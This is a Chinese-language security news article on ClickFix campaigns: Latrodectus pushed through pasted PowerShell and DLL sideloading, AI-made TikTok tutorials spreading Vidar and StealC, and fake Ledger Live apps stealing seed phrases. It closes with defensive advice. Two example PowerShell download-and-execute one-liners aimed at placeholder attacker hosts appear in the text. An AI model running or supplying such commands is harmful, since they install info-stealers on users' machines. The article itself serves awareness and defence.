AI伪造教程播毒,ClickFix变种诱导用户自残式执行PowerShell窃密

admin 2025年5月27日19:49:15评论24 views字数 5852阅读19分30秒阅读模式
AI伪造教程播毒,ClickFix变种诱导用户自残式执行PowerShell窃密

大家好!网络安全攻防的边界正在以前所未有的速度模糊和扩展。攻击者正将狡猾的触角伸向拥有海量用户基础的社交媒体平台,并巧妙融合持续迭代的社会工程学战术与新兴AI技术,锻造出极具欺骗性和杀伤力的新型恶意软件传播链条。近期,一系列利用所谓“ClickFix”技术及其在TikTok等平台上的危险变种的攻击活动被密集曝光,涉及Latrodectus下载器、Vidar和StealC信息窃取器等多种高危恶意软件。这些攻击的核心在于诱导用户主动执行恶意指令,实现“自投罗网”,对个人隐私乃至企业核心资产安全构成了迫在眉睫的严峻威胁。

“ClickFix”技术深度剖析:从Latrodectus下载器看其精密运作

首先,我们必须深入理解由Expel公司安全研究团队率先详细披露的“ClickFix”技术。它并非简单的点击劫持,其核心特征在于“诱导用户从攻击者控制的源(如受感染网站、欺诈性广告)主动复制一段看似无害或有用的代码/命令,并在本地系统上(通常是在高权限的PowerShell等环境中)执行,这段初始代码往往是后续一系列恶意行为的起点,旨在绕过直接文件投递所面临的传统检测机制。”

以近期利用此技术传播的Latrodectus恶意软件(被认为是臭名昭著的IcedID银行木马的“继任者”,主要功能是作为后续恶意载荷如勒索软件的下载器和植入器)为例,其攻击链展现了典型的ClickFix模式:

  • 诱导执行初始PowerShell命令
    用户被社会工程学手段(如虚假的技术支持页面、破解软件下载页)诱骗,从指定网页复制一段PowerShell命令并在本地执行。此命令通常经过混淆,其真实意图是作为第一阶段的下载器,例如通过IEX (New-Object Net.WebClient).DownloadString('http://attacker-controlled.site/stage1.ps1')下载并执行后续脚本。
  • 利用MSIExec.exe进行远程部署
    第一阶段脚本会调用Windows合法的安装服务程序MSIExec.exe,并使用其/q /i <URL_to_MSI>参数组合,从攻击者控制的远程服务器上静默下载并“安装”一个MSI(Windows Installer)软件包。
  • DLL侧加载 (DLL Sideloading) 实现隐蔽执行
    此MSI包的核心“诡计”在于捆绑了一个来自知名厂商(如本例中的NVIDIA)的、自身带有合法数字签名的应用程序,同时附带了一个精心构造的、与合法程序所需加载的某个DLL同名的恶意DLL文件。当MSI安装程序将这两个文件释放到同一目录下(通常是应用的安装目录或临时目录)并启动合法主程序时,由于Windows默认的DLL搜索顺序(优先在应用程序当前目录查找),操作系统会“错误地”加载并执行这个恶意的DLL,而非系统路径下可能存在的同名正版DLL。攻击者巧妙地利用了操作系统对“签名合法”或“已知良好”主程序的信任,使得恶意代码能够在相对“受保护”的进程空间内执行,极大增加了行为检测的难度。
  • 反射加载 (Reflective Loading) 实现最终载荷的“无文件”内存执行
    被非法侧加载的恶意DLL,其核心使命是作为跳板,进一步从C2服务器下载Latrodectus的核心恶意载荷。为了实现最高级别的隐蔽性,该核心载荷不会以文件形式写入磁盘,而是由恶意DLL通过反射加载等高级内存技术,直接注入到当前进程或另一个目标进程的内存空间中去执行。这意味着Latrodectus的本体在受害者系统上“雁过无痕”,完全规避了依赖磁盘文件特征扫描的传统杀毒软件。

值得一提的是,Latrodectus也是在2025年5月19日至22日的“Operation Endgame”全球联合执法行动中受到冲击的恶意软件家族之一。该行动针对多个大型僵尸网络的C2基础设施进行了大规模清理,无疑对Latrodectus等恶意软件的传播和运营造成了显著的阶段性打击,但其技术和变种依然值得高度警惕。

ClickFix的致命演化:AI生成TikTok视频“手把手”教你“引狼入室”

网络犯罪分子对新技术的学习和滥用速度,往往超乎想象。趋势科技的最新研究报告揭示了“ClickFix”手法的进一步升级和恶化:攻击者已将魔爪伸向全球拥有数十亿用户的TikTok短视频平台,利用人工智能(AI)生成或辅助制作的短视频内容,配合极具诱惑性的“实用教程”幌子,大规模分发Vidar和StealC等臭名昭著的高危信息窃取恶意软件。

  • 攻击场景复现
    这些在TikTok上流传的恶意短视频,通常伪装成提供Windows操作系统、Microsoft Office办公套件、CapCut视频编辑软件(剪映海外版)、Spotify音乐流媒体服务等各类流行付费软件的“免费激活教程”、“VIP功能解锁秘笈”或“性能优化加速指南”。
  • “沉浸式”恶意引导流程
    视频内容(可能包含由AI合成的、听起来非常自然流畅的语音旁白,以及高度逼真的软件操作界面演示)会“一步步”、“手把手”地引导观众:这些看似“神奇代码”的PowerShell命令,其本质无一例外都是下载器或dropper,例如:powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "IEX ((New-Object System.Net.WebClient).DownloadString('http://very-short-url.com/evil.ps1'))"。其核心功能就是从攻击者控制的服务器秘密下载并执行下一阶段的恶意脚本或可执行程序,最终将Vidar、StealC等信息窃取器深深植入受害者的操作系统之中。
    1. 同时按下键盘上的Windows徽标键 + R键,调出Windows的“运行”对话框;
    2. 在对话框中输入powershell并敲击回车键,启动具有强大系统操作能力的PowerShell命令行环境;
    3. 将视频画面中高亮显示、或通过字幕/评论区置顶提供的、一段经过精心混淆和伪装的恶意PowerShell命令,完整无误地复制粘贴到PowerShell控制台中,并按下回车键执行。
  • 病毒式传播与潜在危害的指数级放大
    此类恶意视频凭借TikTok强大的算法推荐机制,能够在极短时间内触达海量用户,实现病毒式的传播扩散。例如,某段声称能“一键解锁Spotify全部付费歌曲”的恶意教学视频,在被安全厂商举报并由平台下架前,其观看量已逼近50万次,点赞数超过2万,评论区亦不乏“亲测有效”的虚假互动。相关恶意TikTok账户如@gitallowed、@zane.houghton、@allaivo2等虽已被封禁,但新的仿冒账户和变种视频仍可能层出不穷。
  • AI赋能网络黑产的深层隐忧
    AI技术的滥用,极大地降低了网络犯罪的门槛和成本。攻击者可以利用AI工具大规模、自动化地生成和迭代这些在视觉和听觉上都极具欺骗性的“教学”视频,甚至能够针对不同国家、地区、年龄段的用户群体,快速定制化和本地化内容(如语言、演示软件版本等)。如果未来AI在人脸识别与合成、语音克隆等技术上取得进一步突破,攻击者甚至可能伪造看似来自“可信权威人士”(例如,知名技术博主、公司CEO、IT部门主管)的指令视频,其欺骗性和社会工程学攻击的成功率恐将呈指数级上升。

同类社会工程学屠戮场:伪造Ledger Live应用精准盗窃加密货币“金库密钥”

与上述利用大众化平台进行广撒网式攻击的手法异曲同工,针对特定高价值目标的、更为精准的社会工程学攻击也在持续演进。专注于macOS安全的Moonlock Lab近期便披露了多起针对加密货币用户的恶意软件活动。攻击者通过各种渠道(如钓鱼邮件、恶意广告、第三方下载站)分发经过精心克隆和木马化的Ledger Live加密货币硬件钱包官方管理应用(通常打包为恶意的DMG磁盘映像文件),其最终目的是诱骗用户主动泄露其钱包的助记词 (Seed Phrases)——这串字符是恢复和完全控制加密货币钱包的唯一“金库密钥”。

  • macOS平台上的精密攻击链条
    1. 受害者一旦下载并运行了恶意的DMG文件,通常会触发其中预置的AppleScript脚本的执行。该脚本经过混淆,其功能可能包括:尝试利用系统漏洞或通过社会工程学手段(如弹出虚假的系统授权提示)诱骗用户授予权限,进而访问macOS的Keychain(钥匙串)以窃取其中存储的各类密码;静默读取Apple Notes应用的本地数据库文件(通常位于~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite,尽管访问此类敏感数据通常需要绕过TCC - Transparency, Consent, and Control等macOS的隐私保护机制,但攻击者总在寻找新的绕过方法);或者更为直接地通过do shell script命令执行更底层的、功能更强大的Shell恶意命令。
    2. 在初步窃取本地敏感信息后,该脚本会从远程C2服务器下载一个经过二次打包和木马化的Ledger Live应用程序副本到受害者本地。
    3. 当用户启动这个外观与正版无异、但内核已被“掉包”的伪造Ledger Live应用后,应用界面会立即弹出一条精心设计的虚假系统警告或错误提示,谎称用户的Ledger硬件钱包或账户存在严重安全问题(例如,“检测到异常交易”、“固件版本过低需紧急同步”、“账户资金被冻结”等),并强制要求用户立即输入其钱包的助记词进行所谓的“在线验证”、“安全升级”或“资产恢复”。
    4. 一旦用户在恐慌或轻信之下输入了这串宝贵的助记词,它们便会被应用通过加密信道明文发送到攻击者预设在境外的C2服务器上。攻击者随即就能利用这些助记词,在任何设备上完整恢复并掌控受害者的加密货币钱包,将其中的数字资产洗劫一空。
  • 此类针对加密货币用户的精准钓鱼攻击自2024年8月以来已持续高发,其背后往往活跃着诸如Atomic macOS Stealer (AMOS)、Odyssey以及通过PyInstaller打包的各类macOS信息窃取恶意软件的身影。MacPaw公司的安全研究部门Moonlock Lab警告称,暗网论坛上针对Ledger等硬件钱包的攻击方案和工具讨论日益增多,新一轮的攻击浪潮正在酝酿成型。

缓解措施与纵深防御体系的构建:从技术封堵到意识觉醒

面对这类深度融合社会工程学、利用用户交互和信任进行渗透的攻击手段,任何单一的防御技术都显得力不从心。构建有效的防护体系,必须从技术、管理和人员意识等多个维度同时发力:

  • 强化终端用户的“第一道防线”——安全意识教育与行为规范
    持续对所有用户进行高强度的安全意识培训,使其深刻理解此类攻击的原理、识别欺诈性内容的技巧(如“天上不会掉馅饼”的基本常识、对过度承诺或制造恐慌的“教程”和“工具”保持警惕、不轻信任何要求从非官方或不可信渠道下载软件、复制粘贴并执行未知代码片段的引导)。推广“零信任”原则至个人操作层面:即对任何来源(哪怕是看似热门的社交媒体教程、同事通过非官方渠道分享的“便捷小工具”、甚至貌似来自官方的紧急通知邮件)的、要求在自己设备上执行未知命令或脚本的指令,都应抱持默认不信任的态度,在执行前务必通过官方渠道进行独立验证,或寻求专业安全团队的审查与建议。
  • 技术层面加固高风险操作的控制与监控
    • 在企业环境中,应考虑通过组策略对象(GPO)或移动设备管理(MDM)策略,对普通用户账户严格限制或禁用Windows“运行”对话框(Windows + R快捷键)的使用权限。
    • 全面收紧PowerShell的执行策略,例如,在非开发和管理角色的终端上默认设置为Restricted(禁止任何脚本运行)或至少AllSigned(仅允许运行受信任证书签名的脚本)。大力推广并强制启用PowerShell约束语言模式 (Constrained Language Mode),以限制其对敏感系统功能的访问。同时,务必开启并集中收集PowerShell的脚本块日志、模块日志及转录日志,以便进行深入的威胁狩猎和事后回溯分析。
    • 积极运用操作系统内置或第三方的应用控制技术(如Windows的AppLocker、Windows Defender Application Control - WDAC),建立严格的软件白名单制度,从根本上阻止MSIExec.exe从非授权路径或网络位置执行安装包,或限制可执行的MSI包必须来自经过验证的可信发布者。
    • 部署并精细调优高质量的EDR(端点检测与响应)解决方案。现代EDR应具备强大的内存行为检测、无文件攻击识别、DLL侧加载监控、PowerShell等“活点”(Living-off-the-Land Binaries, LOLBins)滥用行为分析以及对反射加载等高级逃逸技术的检测与拦截能力。
  • 对社交媒体及新兴内容平台的风险评估与治理
    企业应将社交媒体平台纳入整体数字风险管理的范畴,教育员工警惕来自这些平台的潜在威胁。同时,安全团队应关注利用AI生成虚假信息或进行社会工程学攻击的新趋势,并探索相应的检测与反制技术。

当“便利操作”沦为“恶意入口”,数字世界的生存法则唯有“时刻警惕”

Latrodectus、Vidar、StealC等高危恶意软件借助“ClickFix”及其在TikTok等平台上的AI赋能变种进行传播,以及针对Ledger Live用户的精准助记词钓鱼攻击,共同为我们描绘了一幅日益严峻的网络安全图景:攻击者正不遗余力地将攻击重心转向“人”这一最不确定的环节,利用精心编织的骗局、人性的弱点以及新兴技术(如AI内容生成)的“加持”,来几何级数般放大社会工程学攻击的成功率和破坏力。在这样的时代背景下,任何看似能“简化操作”、“一键激活”、“免费获取”的互联网“小技巧”或“黑科技”,都可能掩藏着一条直通系统沦陷、数据失窃、财产损失的“死亡快捷方式”。无论是企业组织还是个人用户,都必须将“时刻警惕,审慎操作,持续学习,主动防御”这十六字箴言内化为在数字世界中生存与发展的基本法则,构筑起从技术体系到安全意识的全方位、多层次纵深防御,方能在危机四伏、真假难辨的网络空间中,有效捍卫自身的数字主权与核心利益。

原文始发于微信公众号(技术修道场):AI伪造教程播毒,ClickFix变种诱导用户“自残式”执行PowerShell窃密

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月27日19:49:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   AI伪造教程播毒,ClickFix变种诱导用户自残式执行PowerShell窃密http://cn-sec.com/archives/4103234.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息